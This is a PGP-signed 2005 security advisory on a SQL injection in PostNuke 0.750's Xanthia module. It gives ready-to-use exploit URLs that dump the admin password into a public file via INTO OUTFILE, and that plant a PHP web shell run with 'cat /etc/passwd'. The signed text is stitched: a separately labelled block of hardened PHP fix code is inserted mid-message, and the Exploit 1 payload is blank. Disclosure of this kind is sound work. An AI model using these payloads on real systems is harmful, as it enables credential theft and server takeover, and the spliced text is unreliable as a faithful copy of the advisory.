-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[PostNuke SQL Injection 0.750=>x cXIb8O3.5]

Author: cXIb8O3
Date: 2.3.2005
from SecurityReason.Com

--- 0. Description ---

PostNuke: The Phoenix Release (0.750)

PostNuke is an open source, open development content management system (CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and provides many enhancements and improvements over the PHP-Nuke system. PostNuke is still undergoing development but a large number of core functions are now stabilising and a complete API for third-party developers is now in place.

If you would like to help develop this software, please visit our homepage at http://noc.postnuke.com/

You can also visit us on our IRC Server irc.postnuke.com channel #postnuke-support #postnuke-chat #postnuke

Or at the Community Forums located at: http://forums.postnuke.com/

--- 1. SQL Injection ---

This SQL injection exists in modules/Xanthia/pnclasses/Xanthia.php on line 977, in the function init_template().

Vulnerable code:

---965-980---
        $sql = "SELECT $blcontrolcolumn[blocktemplate] as blocktemplate,
                       $blcontrolcolumn[identi] as identi
                FROM $pntable[theme_blcontrol]
                WHERE $blcontrolcolumn[theme]='$theme'
                  AND $blcontrolcolumn[module]='$mod'
                  AND $blcontrolcolumn[blocktemplate] !=''";

        // Execute the query
        $result =& $dbconn->Execute($sql);

        $blocktemplates = array();
        while(!$result->EOF) {
            $row = $result->GetRowAssoc(false);
            $blocktemplates[] = $row;
            $result->MoveNext();
        }
---965-980---

The injection is in the variable $mod, which is taken from the GET parameter name. But you cannot see the result directly.
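For comparison, the following is an added example and not PostNuke's own code or the vendor patch: the query above rewritten so that $theme and $mod travel as bound parameters instead of being interpolated into the SQL string. It assumes an ADODB connection in $dbconn that accepts the Execute($sql, $inputarr) binding form, and the $pntable and $blcontrolcolumn maps from the advisory; the module-name whitelist is an extra assumption about what PostNuke module names look like.

```php
<?php
// Added example (not PostNuke code). Hardened form of the query from
// Xanthia::init_template(). Assumptions: $dbconn is an ADODB connection
// supporting Execute($sql, $inputarr); $pntable / $blcontrolcolumn are the
// table and column maps used by the original code.
function init_template_fixed($dbconn, $pntable, $blcontrolcolumn, $theme, $mod)
{
    // Defence in depth (assumption: module names are [A-Za-z0-9_]). Reject
    // anything else before it reaches the database layer at all.
    if (!preg_match('/^[A-Za-z0-9_]+$/', $mod) ||
        !preg_match('/^[A-Za-z0-9_]+$/', $theme)) {
        return array();
    }

    // Column and table names come from trusted config maps, so they may be
    // interpolated; the request-derived values are passed as '?' parameters.
    $sql = "SELECT {$blcontrolcolumn['blocktemplate']} AS blocktemplate,
                   {$blcontrolcolumn['identi']} AS identi
            FROM {$pntable['theme_blcontrol']}
            WHERE {$blcontrolcolumn['theme']} = ?
              AND {$blcontrolcolumn['module']} = ?
              AND {$blcontrolcolumn['blocktemplate']} != ''";

    // ADODB quotes/escapes each bound value for the driver; a quote in $mod
    // is now just part of the compared string, not part of the SQL.
    $result = $dbconn->Execute($sql, array($theme, $mod));

    // Execute() returns false on error. Checking it also removes the
    // "Call to a member function ... on a non-object" fatal error that
    // disclosed the install path in the advisory. Log server-side only.
    if ($result === false) {
        error_log('Xanthia init_template query failed');
        return array();
    }

    $blocktemplates = array();
    while (!$result->EOF) {
        $blocktemplates[] = $result->GetRowAssoc(false);
        $result->MoveNext();
    }
    return $blocktemplates;
}
```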
Error: If you have the right user rights and the function init_template() is active, go to:

http://[HOST]/[DIR]/modules.php?op=modload&name='cXIb8O3&file=index

Error message:
---------------
Fatal error: Call to a member function GetRowAssoc() on a non-object in /www/PostNuke-0.750/source/html/modules/Xanthia/pnclasses/Xanthia.php on line 977
---------------

OR

http://[HOST]/[DIR]/modules.php?op=modload&name=sp3x&file=index&module='cXIb8O3

Error message:
---------------
Fatal error: Call to a member function MoveNext() on a non-object in /www/PostNuke-0.750/html/modules/Xanthia/pnclasses/Xanthia.php on line 977
---------------

OK. First exploit.

Exploit 0 [GET Admin Pass]

Check the directory for PostNuke:

http://[HOST]/[DIR]/modules.php?op=modload&name='cXIb8O3&file=index

Error message:
---------------
Fatal error: Call to a member function GetRowAssoc() on a non-object in /www/PostNuke-0.750/source/html/modules/Xanthia/pnclasses/Xanthia.php on line 977
---------------

For example, the prefix is /www/PostNuke-0.750/source/html/. Now you can build the exploit, but you have to know the DB prefix.

http://[HOST]/[DIR]/index.php?module=Xanthia'%20UNION%20SELECT%20pn_uname,pn_pass%20FROM%20[db_prefix]users%20WHERE%20pn_uid=2%20INTO%20OUTFILE%20'[DIR_PREFIX]/pnTemp/Xanthia_cache/cXIb8O3'/*&type=admin&func=view

and the error message is:

Error message:
---------------
Failed to load module Xanthia' UNION SELECT pn_uname,pn_pass FROM pn__users WHERE pn_uid=2 INTO OUTFILE '/www/PostNuke-0.750/source/html/pnTemp/Xanthia_cache/cXIb8O3'/* (at function: "view")
---------------

But now go to http://[HOST]/[DIR]/pnTemp/Xanthia_cache/cXIb8O3 and you have the password for the user with id=2.

Exploit 1 [Blind upload]

Go to: http://[HOST]/[DIR]/user.php?op=edituser and insert PHP code into "Extra information". For example:

---
---

And now you can create a PHP script with this code.
For example:

http://[HOST]/[DIR]/index.php?module=Xanthia'%20UNION%20SELECT%20pn_bio,pn_uname%20FROM%20[db_prefix]users%20WHERE%20pn_uid=[YOUR_ID]%20INTO%20OUTFILE%20'[DIR_PREFIX]/pnTemp/Xanthia_cache/cXIb8O3.php'/*&type=admin&func=view

and go to:

http://[HOST]/[DIR]/pnTemp/Xanthia_cache/cXIb8O3.php?cXIb8O3=cat /etc/passwd

--- 2. How to fix ---

PNSA 2005-2 Security Fix (changed files only) for PostNuke 0.750 (tar.gz format)
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html
SHA1: 6e76d92124c833618d02dfdb87d699374120967d
MD5: a007e741be11389a986b1d8928a6c0e5
Size: 160550 Bytes

or CVS

--- 3. Greets ---

sp3x

--- 4. Contact ---

Author: Maksymilian Arciemowicz
Email: max [at] jestsuper [dot] pl
GPG-KEY: http://securityreason.com

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (FreeBSD)

iD8DBQFCjunXznmvyJCR4zQRAjFkAJ4lDoD/zYP3lFZD07XsR9WyftT7vACgjRPr
oAXlzjom7BH7yzDRybeHjDM=
=RlgM
-----END PGP SIGNATURE-----